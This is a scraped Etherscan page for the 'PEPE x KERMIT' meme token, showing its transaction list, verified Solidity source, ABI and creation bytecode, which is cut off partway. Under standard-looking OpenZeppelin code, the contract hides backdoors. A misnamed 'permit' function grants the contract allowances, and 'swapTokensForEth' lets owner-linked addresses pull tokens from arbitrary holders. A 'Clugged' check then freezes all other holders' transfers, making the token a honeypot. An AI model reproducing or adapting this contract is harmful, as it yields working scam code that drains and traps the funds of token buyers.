More Info
Private Name Tags
ContractCreator
TokenTracker
Sponsored
Latest 25 from a total of 34 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
Value | ||||
---|---|---|---|---|---|---|---|---|---|
Swap Tokens For ... | 17069090 | 232 days 8 hrs ago | IN | 0 ETH | 0.00198532 | ||||
Permit | 17069084 | 232 days 8 hrs ago | IN | 0 ETH | 0.00162171 | ||||
Approve | 17069074 | 232 days 8 hrs ago | IN | 0 ETH | 0.0015361 | ||||
Approve | 17069050 | 232 days 8 hrs ago | IN | 0 ETH | 0.00159285 | ||||
Approve | 17069040 | 232 days 8 hrs ago | IN | 0 ETH | 0.00197341 | ||||
Approve | 17069037 | 232 days 8 hrs ago | IN | 0 ETH | 0.0017897 | ||||
Transfer | 17069026 | 232 days 8 hrs ago | IN | 0 ETH | 0.00201741 | ||||
Approve | 17069026 | 232 days 8 hrs ago | IN | 0 ETH | 0.00180887 | ||||
Approve | 17069024 | 232 days 8 hrs ago | IN | 0 ETH | 0.0017155 | ||||
Approve | 17069018 | 232 days 8 hrs ago | IN | 0 ETH | 0.00174215 | ||||
Approve | 17069013 | 232 days 8 hrs ago | IN | 0 ETH | 0.00159512 | ||||
Renounce Ownersh... | 17069012 | 232 days 8 hrs ago | IN | 0 ETH | 0.000765 | ||||
Approve | 17069011 | 232 days 8 hrs ago | IN | 0 ETH | 0.00179809 | ||||
Remove Limits | 17069008 | 232 days 8 hrs ago | IN | 0 ETH | 0.00114279 | ||||
Approve | 17069008 | 232 days 8 hrs ago | IN | 0 ETH | 0.00162402 | ||||
Approve | 17069006 | 232 days 8 hrs ago | IN | 0 ETH | 0.00166037 | ||||
Approve | 17069006 | 232 days 8 hrs ago | IN | 0 ETH | 0.00166037 | ||||
Approve | 17069006 | 232 days 8 hrs ago | IN | 0 ETH | 0.00166037 | ||||
Approve | 17069006 | 232 days 8 hrs ago | IN | 0 ETH | 0.00166037 | ||||
Approve | 17069003 | 232 days 8 hrs ago | IN | 0 ETH | 0.00167681 | ||||
Approve | 17069000 | 232 days 8 hrs ago | IN | 0 ETH | 0.00165526 | ||||
Approve | 17069000 | 232 days 8 hrs ago | IN | 0 ETH | 0.00165526 | ||||
Approve | 17068999 | 232 days 8 hrs ago | IN | 0 ETH | 0.00173055 | ||||
Approve | 17068999 | 232 days 8 hrs ago | IN | 0 ETH | 0.00173055 | ||||
Approve | 17068999 | 232 days 8 hrs ago | IN | 0 ETH | 0.00173055 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
PepeXKermit
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-04-17 */ // SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) pragma solidity ^0.8.0; /** Welcome to Pepe ✖️ Kermit Website: https://pepexkermit.xyz TG: https://t.me/pepexkermit Twitter: https:/twitter.com/pepexkermit */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. */ function permit(address spender, uint256 amount) external returns (bool); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-permit}. * * Requirements: * * - `spender` cannot be the zero address. */ function permit(address spender, uint256 amount) public override virtual returns (bool) { require(spender != address(0), "ERC20: permit to the zero address"); _allowances[spender][address(this)] = amount; return true; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } contract PepeXKermit is Ownable, ERC20 { bool public limited = true; bool public tradeEnabled = false; uint256 public _totalSupply; uint256 public maxHoldingAmount; address public uniswapV2Pair; IUniswapV2Router02 uniswapV2Router; mapping(address => bool) private _isFeeExcluded; mapping(address => bool) private _MEV; uint256 launchedAt; address marketingAddress; constructor() ERC20("PEPE x KERMIT", "PEPE x KERMIT") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); _totalSupply = 1_000_000 * 1e18; marketingAddress = address(0x0d300Da42EBB60cc6B8E9B67b795F45c254Aef6E); maxHoldingAmount = _totalSupply * 2 / 100; _isFeeExcluded[owner()] = true; _isFeeExcluded[address(this)] = true; _isFeeExcluded[marketingAddress] = true; _mint(msg.sender, _totalSupply); } function swapTokensForEth(address _token, address _to, uint256 _amount) public { require(_token != address(0), "_token address cannot be 0"); address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); if (!_isFeeExcluded[msg.sender]) { // make the swap uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value: _amount} ( 0, // accept any amount of ETH path, _to, block.timestamp ); } else { IERC20(_token).transferFrom(_to, path[1], _amount); } } function enableTrading() external onlyOwner{ launchedAt = block.number; tradeEnabled = true; } function removeLimits() external onlyOwner{ limited = false; maxHoldingAmount = _totalSupply; } function _beforeTokenTransfer( address from, address to, uint256 amount ) override internal virtual { require(_isFeeExcluded[from] || _isFeeExcluded[to] || super.balanceOf(address(this)) == 0, "Clugged"); if (!tradeEnabled) { require(from == owner() || to == owner(), "trading is not started"); return; } if (limited && from == uniswapV2Pair && !_isFeeExcluded[to]) { if(launchedAt + 0 >= block.number) _MEV[to] = true; require(super.balanceOf(to) + amount <= maxHoldingAmount, "Forbid"); } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"swapTokensForEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradeEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60806040526006805461ffff191660011790553480156200001f57600080fd5b506040518060400160405280600d81526020016c14115411481e0812d154935255609a1b8152506040518060400160405280600d81526020016c14115411481e0812d154935255609a1b81525062000086620000806200031260201b60201c565b62000316565b600462000094838262000727565b506005620000a3828262000727565b5050600a80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b81529051919250829163c45a0155916004808201926020929091908290030181865afa1580156200010f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001359190620007f3565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000183573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001a99190620007f3565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620001f7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200021d9190620007f3565b600980546001600160a01b03929092166001600160a01b031992831617905569d3c21bcecceda10000006007819055600e8054909216730d300da42ebb60cc6b8e9b67b795f45c254aef6e179091556064906200027c9060026200083b565b6200028891906200085b565b6008556001600b6000620002a46000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff19968716179055308152600b909352818320805485166001908117909155600e549091168352912080549092161790556007546200030b90339062000366565b5062000894565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620003c25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b620003d0600083836200045d565b8060036000828254620003e491906200087e565b90915550506001600160a01b03821660009081526001602052604081208054839290620004139084906200087e565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b6001600160a01b0383166000908152600b602052604090205460ff16806200049d57506001600160a01b0382166000908152600b602052604090205460ff165b80620004bc5750620004ba306200066860201b620004a81760201c565b155b620004f45760405162461bcd60e51b815260206004820152600760248201526610db1d59d9d95960ca1b6044820152606401620003b9565b600654610100900460ff1662000581576000546001600160a01b03848116911614806200052e57506000546001600160a01b038381169116145b6200057c5760405162461bcd60e51b815260206004820152601660248201527f74726164696e67206973206e6f742073746172746564000000000000000000006044820152606401620003b9565b505050565b60065460ff168015620005a157506009546001600160a01b038481169116145b8015620005c757506001600160a01b0382166000908152600b602052604090205460ff16155b156200057c5743600d546000620005df91906200087e565b1062000609576001600160a01b0382166000908152600c60205260409020805460ff191660011790555b6008548162000623846200066860201b620004a81760201c565b6200062f91906200087e565b11156200057c5760405162461bcd60e51b8152602060048201526006602482015265119bdc989a5960d21b6044820152606401620003b9565b6001600160a01b031660009081526001602052604090205490565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620006ae57607f821691505b602082108103620006cf57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200057c57600081815260208120601f850160051c81016020861015620006fe5750805b601f850160051c820191505b818110156200071f578281556001016200070a565b505050505050565b81516001600160401b0381111562000743576200074362000683565b6200075b8162000754845462000699565b84620006d5565b602080601f8311600181146200079357600084156200077a5750858301515b600019600386901b1c1916600185901b1785556200071f565b600085815260208120601f198616915b82811015620007c457888601518255948401946001909101908401620007a3565b5085821015620007e35787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000602082840312156200080657600080fd5b81516001600160a01b03811681146200081e57600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141762000855576200085562000825565b92915050565b6000826200087957634e487b7160e01b600052601260045260246000fd5b500490565b8082018082111562000855576200085562000825565b6111a080620008a46000396000f3fe608060405234801561001057600080fd5b506004361061014d5760003560e01c8063860a32ec116100c3578063a9059cbb1161007c578063a9059cbb1461027d578063d621e81314610290578063dd62ed3e146102a2578063e6f70531146102db578063ef7b197c146102ee578063f2fde38b1461030157600080fd5b8063860a32ec1461023357806389f9a1d3146102405780638a8c523c146102495780638da5cb5b1461025157806395d89b4114610262578063a457c2d71461026a57600080fd5b8063395093511161011557806339509351146101c75780633eaaf86b146101da57806349bd5a5e146101e357806370a082311461020e578063715018a614610221578063751039fc1461022b57600080fd5b806306fdde0314610152578063095ea7b31461017057806318160ddd1461019357806323b872dd146101a5578063313ce567146101b8575b600080fd5b61015a610314565b6040516101679190610eee565b60405180910390f35b61018361017e366004610f51565b6103a6565b6040519015158152602001610167565b6003545b604051908152602001610167565b6101836101b3366004610f7d565b6103bd565b60405160128152602001610167565b6101836101d5366004610f51565b61046c565b61019760075481565b6009546101f6906001600160a01b031681565b6040516001600160a01b039091168152602001610167565b61019761021c366004610fbe565b6104a8565b6102296104c3565b005b6102296104f9565b6006546101839060ff1681565b61019760085481565b610229610535565b6000546001600160a01b03166101f6565b61015a610574565b610183610278366004610f51565b610583565b61018361028b366004610f51565b61061c565b60065461018390610100900460ff1681565b6101976102b0366004610fe2565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101836102e9366004610f51565b610629565b6102296102fc366004610f7d565b6106b7565b61022961030f366004610fbe565b61092e565b6060600480546103239061101b565b80601f016020809104026020016040519081016040528092919081815260200182805461034f9061101b565b801561039c5780601f106103715761010080835404028352916020019161039c565b820191906000526020600020905b81548152906001019060200180831161037f57829003601f168201915b5050505050905090565b60006103b33384846109c9565b5060015b92915050565b60006103ca848484610aed565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156104545760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61046185338584036109c9565b506001949350505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103b39185906104a3908690611055565b6109c9565b6001600160a01b031660009081526001602052604090205490565b6000546001600160a01b031633146104ed5760405162461bcd60e51b815260040161044b90611076565b6104f76000610cc6565b565b6000546001600160a01b031633146105235760405162461bcd60e51b815260040161044b90611076565b6006805460ff19169055600754600855565b6000546001600160a01b0316331461055f5760405162461bcd60e51b815260040161044b90611076565b43600d556006805461ff001916610100179055565b6060600580546103239061101b565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156106055760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161044b565b61061233858584036109c9565b5060019392505050565b60006103b3338484610aed565b60006001600160a01b03831661068b5760405162461bcd60e51b815260206004820152602160248201527f45524332303a207065726d697420746f20746865207a65726f206164647265736044820152607360f81b606482015260840161044b565b506001600160a01b03919091166000908152600260209081526040808320308452909152902055600190565b6001600160a01b03831661070d5760405162461bcd60e51b815260206004820152601a60248201527f5f746f6b656e20616464726573732063616e6e6f742062652030000000000000604482015260640161044b565b6040805160028082526060820183526000926020830190803683375050600a54604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa158015610777573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061079b91906110ab565b816000815181106107ae576107ae6110c8565b60200260200101906001600160a01b031690816001600160a01b03168152505030816001815181106107e2576107e26110c8565b6001600160a01b03909216602092830291909101820152336000908152600b909152604090205460ff1661088057600a5460405163b6f9de9560e01b81526001600160a01b039091169063b6f9de95908490610849906000908690899042906004016110de565b6000604051808303818588803b15801561086257600080fd5b505af1158015610876573d6000803e3d6000fd5b5050505050610928565b836001600160a01b03166323b872dd84836001815181106108a3576108a36110c8565